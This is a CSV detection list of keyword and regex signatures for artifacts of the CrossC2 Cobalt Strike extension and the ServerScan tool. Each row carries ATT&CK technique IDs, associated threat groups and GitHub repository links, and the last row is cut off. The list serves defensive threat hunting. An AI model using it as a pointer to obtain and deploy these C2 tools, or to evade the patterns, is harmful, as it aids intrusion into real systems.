"*crossc2 dyn load*",".{0,1000}crossc2\sdyn\sload.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39092"
"*CrossC2 framework*",".{0,1000}CrossC2\sframework.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39093"
"*CrossC2.cna*",".{0,1000}CrossC2\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39094"
"*CrossC2.cna*",".{0,1000}CrossC2\.cna.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39095"
"*CrossC2.git*",".{0,1000}CrossC2\.git.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39096"
"*CrossC2.Linux*",".{0,1000}CrossC2\.Linux.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","#linux","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39097"
"*CrossC2.MacOS*",".{0,1000}CrossC2\.MacOS.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39098"
"*CrossC2.Win*",".{0,1000}CrossC2\.Win.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39099"
"*CrossC2_dev_*",".{0,1000}CrossC2_dev_.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39100"
"*crossc2_entry*",".{0,1000}crossc2_entry.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39101"
"*crossc2_portscan.*",".{0,1000}crossc2_portscan\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","39102"
"*crossc2_serverscan.*",".{0,1000}crossc2_serverscan\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","39103"
"*CrossC2Beacon*",".{0,1000}CrossC2Beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39104"
"*CrossC2-cs*",".{0,1000}CrossC2\-cs.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39105"
"*CrossC2-GithubBot*",".{0,1000}CrossC2\-GithubBot.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39106"
"*CrossC2Kit",".{0,1000}CrossC2Kit","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39107"
"*CrossC2Kit.*",".{0,1000}CrossC2Kit\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","39108"
"*CrossC2Kit.*",".{0,1000}CrossC2Kit\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","39109"
"*CrossC2Kit.git*",".{0,1000}CrossC2Kit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","39110"
"*CrossC2Kit_demo*",".{0,1000}CrossC2Kit_demo.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39111"
"*crossc2kit_latest*",".{0,1000}crossc2kit_latest.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39112"
"*CrossC2Kit_Loader*",".{0,1000}CrossC2Kit_Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","39113"
"*CrossC2Listener*",".{0,1000}CrossC2Listener.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39114"
"*CrossC2MemScriptEng*",".{0,1000}CrossC2MemScriptEng.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 